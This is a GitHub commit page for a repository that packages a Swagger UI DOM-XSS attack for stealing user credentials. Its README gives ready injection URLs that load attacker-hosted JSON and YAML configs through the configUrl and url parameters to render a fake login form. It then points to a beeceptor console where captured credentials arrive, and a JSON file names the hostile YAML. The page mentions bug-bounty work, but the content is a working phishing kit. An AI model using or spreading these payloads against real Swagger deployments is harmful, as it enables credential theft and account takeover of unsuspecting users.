-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit d86d114
Showing
8 changed files
with
16,636 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,2 @@ | ||
| # Auto detect text files and perform LF normalization | ||
| * text=auto |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,53 @@ | ||
| # Steal Users Credentials via Swagger UI DOM-XSS | ||
|
|
||
| Find xss at swagger ui and the triager didn't accept it as there is no cookie? | ||
|
|
||
| Use this repo to make fake login form and get user's Credentials | ||
|
|
||
| Read this article first https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ | ||
| and practice with https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96 | ||
|
|
||
| ## Demo | ||
|
|
||
| If you found Swagger UI try test xss | ||
|
|
||
| inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/test.json | ||
| or | ||
| https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/test.yaml | ||
|
|
||
| For Steal Users Credentials with form | ||
|
|
||
| 1. inject this at https://api.redirect.com/swagger/index.html?configUrl=https://m0x0101.github.io/lol/credentials_form.json | ||
| or | ||
| https://api.redirect.com/swagger/index.html?url=https://m0x0101.github.io/lol/credentials_form.yaml | ||
| 2. visit https://app.beeceptor.com/console/alqa3qa3m0x0101 | ||
|
|
||
| ## Feedback | ||
|
|
||
| If you have any feedback, please reach out to us at [email protected] | ||
|
|
||
|
|
||
|
|
||
| ## Authors | ||
|
|
||
| - [@Mohamed Reda](https://www.github.com/M0x0101) | ||
|
|
||
|
|
||
| ## Resources | ||
|
|
||
| https://medium.com/@AlQa3Qa3_M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96 | ||
|
|
||
| https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ | ||
| ## 🔗 Links | ||
| [](https://www.linkedin.com/in/alqa3qa3m0x0101//) | ||
| [](https://twitter.com/AlQa3Qa3M0x0101/) | ||
|
|
||
|
|
||
| <a href="https://www.buymeacoffee.com/M0X0101" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a> | ||
|
|
||
|
|
||
| ## Tech Stack | ||
|
|
||
| **Client:** HTML, JS | ||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| { | ||
| "url": "https://m0x0101.github.io/lol/credentials_form.yaml", | ||
| "urls": [ | ||
| { | ||
| "url": "https://m0x0101.github.io/lol/credentials_form.yaml", | ||
| "name": "Foo" | ||
| } | ||
| ] | ||
| } |
Oops, something went wrong.